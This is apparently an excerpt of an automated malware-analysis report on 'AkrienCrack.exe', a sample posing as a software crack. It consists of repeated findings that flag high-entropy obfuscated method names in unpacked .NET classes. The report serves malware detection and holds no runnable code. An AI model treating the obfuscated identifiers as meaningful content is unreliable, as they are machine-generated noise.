            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, K8DjBZLuminEjMcYHwx.csHigh entropy of concatenated method names: 'CU7aST9Vqu', 'U2ja0BGX3W', 'IKIaPqp0uQ', 'bruaFKYuA5', 'Bw6afFty5i', 'E6NKNiHE6PqX07Ipqtd', 'oSMygOHzfNNmtdi69VO', 'xePR8aH25dOTK6MhJiS', 'tawRNuHX8SaiZKLWsX7', 'qw5QHmrYRIA4q9kguJM'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, QqUK2tIBPixp7mC29nj.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'MDgNxwWMDIpNM2S6moM', 'SYd0xrWNnw5IITtjkUJ', 'O7EhTtWqv2qIZUmXAyn', 'O1Ioj4WhumV53anqd48', 'eHT2LTW2g47Rjm5mm26', 'jOfoRBWXURRrp5qG17C'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, OyRyHZImVcS8foBJoD6.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'dmaBxQ7Lgp81ifl5SHx', 'jfQ8Hx74BY0Swf7jMe9', 'QalsMJ7SRcK9FtWGQUY', 'bOvTtq75DqaMlJ9QCCa', 'VWMfxF7aoAgf2VqGNBi', 'pYnsI47KICNus5F32TW'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, F0MuSiLbakXQmtuPw95.csHigh entropy of concatenated method names: 'uOSuUrbFV1', 'R4KuNsufM9', 'DtwuSd0JQO', 'r9Lu0Dfn97', 'LBxuP2UIsF', 'VJ4GpwrKyqBgu4ccfQ1', 'QXrO1MridBcaAC6ONiY', 'T2yvkwr59AHcF9KPjIk', 'EPL8dvrae0ObbSAvMK9', 'W67MEOrUKgKycJuvPDX'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, EBIa5RIPIWwUrJZqCpk.csHigh entropy of concatenated method names: 'E4kIjGKg53', 'soIOYHcU9o6aT9kwhhN', 's1KXaocGiYpqkxXDyVJ', 'AKspR9cKyFDjOujjob6', 'VPmPu7ciVJRyqrbYFuK', 'UK7UqwcuSUmLt8l9uQM', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, IVr1gMLoJYnnyOVPjwf.csHigh entropy of concatenated method names: 'n23wjfMLUV', 'RgKwNSklpP', 'FiowSPBqlx', 'qHww09G1KE', 'ReRwPC1WdA', 'JejwFqBPTu', 'o9uwf1sXtB', 'HljwrvVY2i', 'eQpw1Y1QWx', 'WsDwqpZDFp'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, WcFxRkMac7WnaYWutC.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'eFmUUQBsvbpeQPQKu8P', 'K1EcYwBPrMlvhxADZE3', 'grw1DJBpKmQVCa4QNVj', 'hQaCsUBIiQWhTLkXsb5', 'SBfO4rB6RNBaYxVHXSh', 'kafVtUBw1xVWQZ041y0'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, WRmTQfeYJXDb8lvGAh0.csHigh entropy of concatenated method names: 'yyniRADUnR', 'DsmihSxNXv', 'x24ix8d1Ic', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'Ajxia2dWxX'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, Pk709IIRX7ZoAbLRXmf.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'oc2NjTWWLGRDd5lkf5c', 'STHST0WFySuMHyCgBaQ', 'YUXBoDWvGvyR4sirWmx', 'HNi7NaWc8WCUc8Hbrqn', 'XoBX5yWb3GfiGVo4ORG', 'U2VUPJWyadee0BUxRs8'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, tX3jA7mtoua67GWyFfS.csHigh entropy of concatenated method names: 'cmelOrL9n4', 'sc6low5rsp', 'iRTl3MIwB7', 'oeUlkrf8Dj', 'oZml6inEjM', 'zhdvPAw7WKxEL8T1J2d', 'tx0Rm7wW2bS7cPWWBPE', 'xOcwlQwB0EHQtJAMcLQ', 'dO4ZZIwlmry9q149GpK', 'nOkh0kwF8RZFtxtGhbR'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, EqCk0Id3jxhsIidHTnh.csHigh entropy of concatenated method names: 'BgQcLbM4yh', 's3ccdZ650a', 'hywceBSNmv', 'mTEcC1sUKL', 'tRWcllARaZ', 'OhOcREkv2y', 'wdUchHVrps', 'lk5cxU2c7e', 'nX9caN7GLg', 'Mixcu8OeWf'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, O54hIOdm6syBaileAkZ.csHigh entropy of concatenated method names: 'XHfTRw5DpSekGvSWpEj', 'gTK8YO58qoU7ojum1iw', 'eErvlH56f6oY1H2RPvp', 'ncfr5P5whAcyOFABYhJ', 'jhWVvTi8py', 'XZG1ad5ryTdcQi29GZa', 'wKMcdu5x5GSPlVXvFJs', 'GKHlGM51T1TDNgXvcTK', 'VlaODO5HWQ7NS6MbnZn', 'GYFrog5kIZ3a3NpX6gN'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, Va5IdLI44eTxiHJCW89.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'BLWcZqFK7UCfWjICT8F', 'LFuEVgFiFhPHMU1y21t', 'ht3RMIFUxv0qvQW0Xdv', 'gJRvELFGQF1BVpuZ2vP', 'qAgSq6FuvpHQbftdCbU', 'Mt2W9MFCp984a2Xdvpu'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, U72LEYyfa1Haovmiyr.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'Prgv8Ul7PnPsTTkHmu5', 'EsiRwmlWocbUvKmC8q4', 'ETdi0olFqlU8CV0LPli', 'e1UcTFlviohuyDTci0w', 'S3bU5slcRMR3Svhnbfi', 'uEMh9tlbJyxkm1I2500'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, zKSKo9myl7tHvjy5fSj.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'WPXj04EdmH', '_168', 'Ig6xdI8Hfv3Zq38o0qU', 'CopK9h8rM4xJfXf3FoQ', 'bOOB2N8x8MlFCwteoxa', 'c6EYdD8klldeDIJ7p59', 'jBknYY89Mu1gLnLcJwG'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, K9aengmMa7W2JgrH1pn.csHigh entropy of concatenated method names: '_5u9', 'dHejyULTSj', 'tAHhAiTDe1', 'Nq1ju8iXpP', 'rwyhVWD2NpDS2YKpjig', 'qUZS6HDXGLUav671dOX', 'yeUSaHDEOuqNEE2H7J3', 'xNQBjWDqg0M4LNivi0m', 'krhTMmDhdsv5y2Pq89q', 'mp1fPBDze0kUnJdaUQg'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, JePjb1Pt64aGmvkx76.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'j9s5hGdi5fNm82djq6Q', 'YsuMNPdUcLKIwlykR8t', 'cAL9V7dG3Fo496p4tcG', 'IEB4XNduq1Z4YtIBh3E', 'auCdfodC2lds9j6q1Hb', 'qBiIZbdtFptPTPkHmUH'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, uGHFG3LiPNHRYkRDi6c.csHigh entropy of concatenated method names: 'P8B9Uk5IB0', 'r089NwLshe', 'Hqy9SBk4Qh', 'aHr90uEHsV', 'xLQ9PA4JW4', 'pDQL3DxpMJelHWEsUn8', 'ogXZKqxs7sZmYc81uJv', 'EjWClwxPQHFUGXsCuYR', 'TsNlKSxIyspY453Q59W', 'Y3xCHix6lF17VLZ6Slg'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, WXMkOM5NJNougT0fGw.csHigh entropy of concatenated method names: 'nBbNooVcX', 'PnhSH5Yi5', 'vuX0wpUsT', 'Xe8oQk3GyxpcxyLadh7', 'AgQpEv3iFJHlVmLn26F', 'lbKrPJ3UHQsbOjE5473', 'CxxNfC3uT9VcCbA2FLN', 'meHnTW3CbSUHkNLElYi', 'wkrr3s3tnKFfGkUONXw', 'gLxG3y3TB9RrIDKxbsZ'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, Igd2vxmIHZi2nY6jRPd.csHigh entropy of concatenated method names: 'wsXCX6CPDN', 'FKnCnV7yt6', 'j5eCp74MGg', 'zMGCE2oc3o', 'x9JD8dPzgbf2X0bNjt0', 'nInhCoPXVjxnBw4hfi9', 'YJaqrXPElHcNKEtUdcM', 'u0yPpypY4NORujuCnbE', 'SH1Gpwp37eFpEnYC1E2', 'T92AAZpJDjVioYkH6lM'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, rwEgZheplS3itYinwqW.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'tlXicWugdu', 'O0Hi5JUouR', 'pG9iiECUPy', 'XiciGAEsHj', 'PJxiYnGsi1', 'Bb1iXsBHSj', 'wZemubTU7VubJag8WnQ'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, eyIXJ5diuvIdTgxq3sZ.csHigh entropy of concatenated method names: 'Ik7vFoAKrl', 'u4NvfugrNZ', 'HM1vr3Lo2N', 'lkZv1wklpb', 'beRvq2muWE', 'PnE830Ukx9FeNlO2ake', 'kjAsswUr3cuM71eK7Lr', 'N21kSZUxJjCa64sJI0U', 'kvqfMUU9QgLBno9Kmi1', 'sJJ6IFUL7e27B8bXMG5'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, NBehHxdR59aGcu7ddk7.csHigh entropy of concatenated method names: 'vA1vVcu6og', 'uapvb7WnY6', 'pK7pMEiNhGTb1iMHTDK', 'yT0ymUiq7bKvDR6LBCm', 'bGOk0HihUATtDACU1tP', 'UWI18oi24jy6nCdx9ul', 'xVI2cNiXWJGnjjsRMXf', 'N3LGejiEvauIvqx2tyN', 'ixUM0xizPcaiUMmPGWj', 'wPA94kUYBNhcoCMt37v'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, nEH65XTQxcn8ISe2sPE.csHigh entropy of concatenated method names: 'UcELb47wKH', 'MFZLsKFHnu', 'SbNLQuPuhY', 'FAOL4xeLnF', 'rigLvA5Gtu', 'pkcvc9eYntj9FJYhuwe', 'WNQgjxe3oAP8431i2Di', 'awiXGbRE6CMrlr9bXUD', 'e1JGbNRzITDaNXr88SN', 'BrpuIJeJ1RX7XElZf7R'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, TpSFP7fnJV099EZ6QF.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'kap6gXdh76VZAtsb2L7', 'FcNqpld20YMeENn94dA', 'bto8tEdXOtqkqAikywt', 'xdpP8cdEHQ1BIaWuJYN', 'Pr28ssdzL3SgCfQuRIH', 'ftDAvGBYp4N4wmyRmfa'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, IMxKL9TACBKEt4IJShy.csHigh entropy of concatenated method names: 'IjPTcJ2yve', 'Q7fT5Q4yby', 'aVQTiNZKZn', 'qlngspy5aaCfIv4YFH3', 'XkaEetyaYklXI6sPyu2', 'TosoxJyKHvrd1L8L7x9', 'JoQASDyiGeB5G8S3CLV', 'IkbLE0yUasNSLechgFb', 'hVMRRDyGceNq60xuh03', 'LwyM1Py4nGYYEnABYpD'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, Qwlb79I7RZAV2xNM4K2.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'GTnP25bSK1MwrxZ9hGO', 'xwnsj7b5tpd6UkP6UOb', 'l79eCMba76dMiFgq6NM', 'jl6ddjbKe1CRYJlH5ww', 'ugaqG5biKDcbsbOj38b', 'aBqoI4bUEBMXMe7qqAa'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, rXs0YCIn5MVX9jwHFAG.csHigh entropy of concatenated method names: 'QMeI83LrNM', 'xBZ4eucJ2kbK3sTJLQ1', 'w098Iscdi9GYBtFBlxy', 'gMgOd0cY8MQwSwiygq1', 'jdNmwGc3sUVxeU5yE21', 'rgYC08cBGWm5aJY24EY', 'Q8WFg1clS2yesR6bMEI', 'pfI4uQc7JBd8mKoP4CX', 'svtIK281xy', 'ooUVjocvWqlSMalpBP8'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, KM9ntwe4d0JQOH9LDfn.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'DRB5vlFl7u', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, TfwPTxUENEcUIJC4tM.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'LH2qy8uLC', 'kBDyGBJKmytMJLYwoYT', 'JE8KyKJiFuwP8NyAU5T', 'i5giYNJU5mO4prcpAA1', 'afucKiJGnwUZGFixkHZ', 'iKEe3YJuaTUI6rtR5b6'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, yQxUDoGjSN6MownrtR.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'zTSwDIJbU0JGcakdB0k', 'IIXdQAJyemQL03KV1la', 'cgpMZCJVbKRwWl2PNEw', 'Aoe25IJjAUyQL3Sh2kM', 'khbBS0JgtfcF5WSJdLD', 'HSEIeDJRFoWT44rF1HN'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, EJRVEyprgdxVpJXC3O.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'IC1fdwnAh', 'P7kLNlJpePgplP0tHGA', 'YIuGa0JIAQ3T5MHVNPJ', 'MZHBR1J6kBoC7EBRt1K', 'eitafUJwxDPHT5cAQWJ', 'jsBnyyJDvkyE7i31FKY'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, cupOOgmu6jCnlwctGXW.csHigh entropy of concatenated method names: '_223', 'TXxMxy6s3O3ciAtUXNR', 'qDTIiQ6PIHBA5BaiMp6', 'P5poB06pWjh5260SE8a', 'YhyvNQ6I9svyeJZ5f80', 'JWyrtd66BiLwrnKEW6n', 'zuxKEL6wt5XvJwGifSx', 'FW5OR06Di9BBjil9AR7', 'UrBNUZ68b9totyGipDg', 'S0qBYu61xjCbOoDRMVE'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, VMnMMmd6skwxkSRV6L0.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'bH1c420nxJ', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, NsqC7TmzaBcHs5P93Bq.csHigh entropy of concatenated method names: 'hVAhG4XxB9', 'GeohYYSUK5', 'C8vhXk9aAX', 'HLDuoT1tBh03PeZKdGX', 'ioY53J1TTPk6ebDvhgB', 'T3qTfw1u78OlrZaGsXy', 'cTu0dn1CZDShEZmZ5Mg', 'eBTDM81nBXW7vwicrnY', 'gxAagh1AQiGiJuFW0bx', 'uMa6e61QBOPbj82y6Kr'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, OxHtQZe0x2Kotq3yDoI.csHigh entropy of concatenated method names: 'tARYPl4Zq4', 'hbo9iInLhfmEwan3I9K', 'TxcZ7Dn45qZt8owHpbW', 'z2TdtGnkDFZemUTDLId', 'DceJh6n9twgeAurQ6ot', '_1fi', 'VeGG7XLMBV', '_676', 'IG9', 'mdP'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, A7NSCtIi9qOJ5eGf4IU.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'TWfj6HFEPV12SKcMA4O', 'fKrHupFz8AbIgIL9tL6', 'dZdWEOvYc6IJVPwqkMv', 'btRxRMv3llNDe6gKbnb', 'pxhll8vJ30F6Dp5DG3O', 'SZePEivdAP1aoiTxw48'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, wfvJRJmsvYgcdxD4n4s.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 's9n6n5DjpvcHomhhLsF', 'IcDbASDgAmCItHswTW1', 'VV817tDRYNSDD9vRFfk', 'Drcy7jDePJISl5aq6lR'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, j9T5G9TDKuGCN3ie2Mu.csHigh entropy of concatenated method names: 'ebeCcKw4RU', 'IWTg65PmDwBJJXSKSWA', 'NS23BgPOWF7G9U0DX5G', 'aHgBkFPZnrOhEQtMoEc', 'pZ7tDIPodoWkNkubUkP', 'mJGQTKPM4T2GrJhgXu4', 'hdoCJ1e9vg', 'Eo9CH3xZw0', 'vyJCVJmBAw', 'DD1CbhdKeW'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, rJnOUEIu4FQpGUR7CcZ.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'MST3wCWxtbQj0rZqOrP', 'l1Eek7WkL1wFWVDLhLg', 'x1ao1hW9Iq6wrCLPFQu', 'wksqHWWL8bEB4bQrS8o', 'fcedxuW4kNg48gjfL63', 'xKOPlXWSfmtC6w6cEmt'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, WAeOCAeZKTBo5c1jjgw.csHigh entropy of concatenated method names: 'TQ1XQlRcL2', '_1kO', '_9v4', '_294', 'ABlX4Jj3cg', 'euj', 'oJtXvKpFl4', 'uobXc6jCYq', 'o87', 'ipBX54uqmn'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, VdJwLKTVvdS3WU3eRl4.csHigh entropy of concatenated method names: 'IljL9PMxKL', 'lCBLwKEt4I', 'gKdmjwR1O4QuGx6cilL', 'x2Y7xPRHS1PPOwdvJMK', 'dwL1VIRDyo3A1TjDfDK', 'VAcrbdR8FEjqfBTVFpn', 'vcvt64Rrn4hnqoIAwb9', 'vGtyelRx4nrrjYivOXo', 'VZeuInRkfrtXVqh9RcQ', 'SbiXQpR9mpjMVO1kZU7'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, KLU84FLdtog4Jnardem.csHigh entropy of concatenated method names: 'jpPa2TNOyC', 'gqDBuVHPv3ccaxX2QBH', 'DnRQxLHp8eNkRG8GQte', 'U6BgUNH0eLnlpVJUxIv', 'RjExutHskOMKhtmcFBF', 'KolhnTmhpW', 'XkPhpwkrBC', 'J3thEqrI3r', 'V7ThUdrPC7', 'YlFhNBdWKX'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, dcdj5kTTpP3o9ZEKVF4.csHigh entropy of concatenated method names: 'hUxTKkJJWJ', 'rVYTy02ELa', 'RNYTZx3739', 'OTNT7SKTsh', 'bDPTOTdoEs', 'zV0TobcytH', 'vL3rYBVs6kNw1XJNKSk', 'aGdRuuVPIOyd89tRoRF', 's5SDW9VeyEWScdqaf7n', 'Y2LmTuV0l7B3pfYB0fb'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, O2YtyfIDiYTK070fC05.csHigh entropy of concatenated method names: 'pWhTQsRjgk', 'T09T4IX7Zo', 'abLTvRXmfm', 'ryitSeyb4hfqGxDAJEw', 'A1yyeUyvs0tfBlpiuH6', 'x6XDGWycDTQeKnqBykA', 'olIhD9yyAtieoXlLS4X', 'xaAPLYyVAeyRJGMLkUC', 'MZuadByjEj4wPxEFDsk', 'Ut0WRfygYuq7CVQC5Bd'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, lIPbOfIYOHHrYvNO3qc.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'A3y6n3viAYmderCd449', 'kVGZw7vUfqZaUucKiS7', 'eeTAwtvGLBleAiyJJVe', 'i24huOvuKtcZwhKBiUu', 'DFlJ6OvCRpWkQxklXsN', 'L0DZgCvtmMHMXn4sLSh'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TwdfpBTRnVmp5R65UE5.csHigh entropy of concatenated method names: 'X6RmEBEolN', 'xHhmUoXXnE', 'MnhmN30RZv', 'Y6nmSYcLvQ', 'VSnm0Q2y8G', 'ECpmP5KLO5', 'HFFmFmfngW', 'fhe2LGj1lpFTRgRiUJV', 'ch5j88jD6mKeM93Nrnf', 'FWkxqTj8UCEsm4QppD3'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, s4wpNiLZ0WUYsPOnqfX.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'WL3wWg2byt', 'veUwBsRIl1', 'r8j', 'LS1', '_55S'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, IH93p4mwYBQO4SokTUB.csHigh entropy of concatenated method names: 'I0KlqxsYdE', 'TaTlMrx11t', 'zsrl8U05qy', 'z5ElgmUCAC', 'vakmpH6aXvrrLJtfy8T', 'EV0W696Kx4Wc7wOltCV', 'kps6fD6i1DSYHs0oc42', 'oF5DuX6SgGsVvrp1Iun', 'XcXdoa65NyLjIsIIJhd', 'd0Dp646Ub4FR4FyutZU'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, jvIp3gTfEixZsGdfVAC.csHigh entropy of concatenated method names: 'AaSeliqjdj', 'aMSeRBUXrC', 'dqgYVysqPs6dDZ9UCXQ', 'aZU5eNshodkvi0iPkJA', 'ciSWmVsM8BBi7KZvVJB', 'Cxo1QusNxVXJwme3Hlx', 'mT5e2G9KuG', 'IexjGGPYqmuMLR1lKmr', 'Oietf9P3lXq61Q3T1Tt', 'JKwg9tsET9PVLGx2eZg'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, qO5yTFmLu5opX3ZMV1f.csHigh entropy of concatenated method names: 'AVuC15sW7R', 'AS6CqHxtVk', 'Ls9CMCQvYk', 'BWiC85Ck4q', 'qJuCguWhoD', 'oE8CKtZXBu', 'MZrot5p9wRF81jdIEv2', 'HRWG6CpxLtk2xc3bZgl', 'QQiIEmpkhaHq5DO5kZT', 'D8bG7EpLfSrMnpdraaU'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, Me6JAxQ4of4LhCOr6L.csHigh entropy of concatenated method names: 'bjMvZlUJM', 'xq7cA6tYu', 'ecy5MWr3L', 'PtOiTEQr7', 'H0kGaLq4p', 'i6HY80B8Y', 'yGJXyxIeG', 'GHJgF33Fbn7KVTWuSjg', 'kMAaRB3v6WwG1rWjoKW', 'T9pgap3c56bZDscXbTZ'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, sv4rMwIyuQXEuVp8nnk.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'qgiKaBb6jY4Rpdu4F8E', 'rFabVLbw9lt1VE9dhVt', 'HHJwevbDLFv1eSCJ194', 'lm2hXdb8PtcSHuW15km', 'Lxyw3Wb1O7OZw4d6ouM', 'F9ES7IbHQcbmDsVn2XU'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, g3sLrMesBbvOMqVG0fk.csHigh entropy of concatenated method names: 'yJA5Vqwc3R', 'tHU5bEwlSZ', 'Bee5sseiB4', 'oeJ5QxlEm7', 'Odv54OE3X6', 'RBuh3pC2vlw3f4o0lYx', 'fnUAXdCX7nWCZXDVapE', 'cVnOHlCEZNGAGeLyRuO', 'UosYGMCzapShMegxME4', 'rCeCkwtYE2ZfQY0Us8M'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, i81QY8TYuIs4vFfXLRm.csHigh entropy of concatenated method names: 'DM0Lj9jqX7', 'oE0LDH5gtS', 'v3dLzJwLKv', 'eS3dAWU3eR', 'g4wdIsiKAA', 'wEPdTDaodH', 'A79dm4XBFD', 'UAFdLX5mlK', 'CnHddSwEH6', 'nmXBTfeqemZLwOlmwnx'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, il2IAWdETABuWR6m6cs.csHigh entropy of concatenated method names: 'r8DvO11xSL', 'l7QvouXB78', 'nPcv3KqHmW', 'BRQvkbRM3k', 'zRIv64FyIp', 'f9Pvjjj1Xy', 'DHlOxqUOIBJJlKRgqvH', 'b47f1HUQeHnLPf4ITZx', 'NnkfBMUfTdgRfKJ2cuE', 'oRy6ufUZ5BcLcjP6SXc'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, xIT5YmIg81BwKELfqgQ.csHigh entropy of concatenated method names: 'aC6Txtrw6W', 'YNqTagSm2k', 'OcqRIwbyYOCp99QUyjw', 'fMxeKjbceUSuw7VMb8T', 'OI37axbbNToKhWeijLn', 'Q5GOAFbVYjP5JS8HK88', 'adI5HKbjYBVF7c1lYMK', 'Bj4y4BbgSyVfk1gsmfs', 'aZ6aC0bRAf2BLxakB2Y', 'Y5vVavbebKLZWLuydC9'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, vxIWZ2mvRGvZl5SgiHJ.csHigh entropy of concatenated method names: 'rXbREpPqx3', 'RKxRUXleJE', 'Nerb6fDPtI2ho5SJOCT', 'A1DQkpDpvQIefPnHdWh', 'cwI8aND03hbDWq4NtwQ', 'nLo5fPDsQA73wCchXPa', 'G1OcFjDI7hu4BHW0rLl', 'hXDcMYD6nNJahOPrRuR'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, vNULWuT2mnfUhyGDvVO.csHigh entropy of concatenated method names: 'wK2mjSFlIW', 'DoPmDtVcEB', 'NCwAmhgpmUEl7pdrpbw', 'ld8dr5gIrxAh2TCwXBM', 'UP0G6Tg6bGPLN9vS4qV', 'tXjSYWgwhsESLOdFZqf', 'BS6p1vgDdwGMWw3s0Hf', 'Rcpqsmg8nV1c5hfVG1g', 'JXmYXeg1wn5NjK6PRPx', 'y9OrsZgHaiqHWIFUn4Z'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, HubuWUCxinHEtH6L3g2.csHigh entropy of concatenated method names: 'cWSQFZooFoBrU', 'pXX3kFQRIdXtm34Rni8', 'lcerWcQeQ2wpI80ygdQ', 'qgLJtwQ0Mm86GZI4ioN', 'qrpShFQsnCTE9xpl337', 'hfMw93QPf9H3yUCOqQK', 'LNHoQdQjPMUi9u52fhv', 'lpIWtQQg04tHsJ9bAxP', 'spgiX0QpTeMYBLQ9ArC', 't8fYKUQIFYmMyfCAZ8Y'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, IqcmvwdncZ0sNPSCbVR.csHigh entropy of concatenated method names: 'w6kvKilV1r', 'WY4vymYypY', 'bMGvZOItjo', 'j7Q9hbUC7iUhJbfS5I1', 'zcwxOTUGn9AXFuV287h', 'IUtp0eUuyuvY7Sahs6h', 'vjtYyrUtpvyuVBeWGax', 'oqrSHdUTroKdOFeJctN', 'UY0AvJUn9MTVQiRABix', 'pijxvFUA8nI9H2ZDdlB'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, mjXiH9Iw8qI21RXoth7.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'GYx7gKWuSl6aJLEVS6M', 'fKmSCVWCUQ2U4uWunSo', 'gLmctAWtMrObRDHOVmF', 'CP8E84WTU8rxsgmCRCY', 'gAgTUNWngoZMvZTbgy9', 'bpSyDlWAcdRBaIB8F5R'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, Ch30RZIrvD6nYcLvQ3S.csHigh entropy of concatenated method names: 'e1GTIJlElI', 'COiTTh5HaH', 'mAQTme5JxZ', 'd4gyLYcoiAPkP3RwofL', 'OcHc4jcMniuRHUQuhlX', 'iDCxEZcZMdTCBupM4MV', 'WjyOWCcmkoW9rAMfLoc', 's8kmVmcNRDkTQJCMMay', 'lhlXC0cqYwettaJi7AL', 'DuqduxchRH6Lfoq5tOA'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, yreLk8LxTmerL9n4Vc6.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, jqTpyseiqpAIuD3HEEI.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, GH9f9xgQcnDETOPx5N.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'ab41FcBnX5VtJF69fnP', 'O0UpwkBAn42lFOnIkJo', 'bcu2TtBQKC292AZivmL', 'hdilcEBfNcIK2ZGNIoL', 'l2kbZfBOgqKTZIuWv7m', 'QUdsFKBZjwp03UHkpeB'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TlUOfImhs5BD8vYScS4.csHigh entropy of concatenated method names: 'jmnlU5SaPW', 'TOclN1VwLj', 'V2YlS5bs25', 'qrhA956g0xIbTSCdPSG', 'Xry6b26Veev8JQ8dO4G', 'TJeRfJ6jJm3GyhY4XWh', 'iu683M6RcGyD1lGpK4H', 'nsdlWpKyiI', 'zZIlB2RofT', 'Slrl2lC3ig'
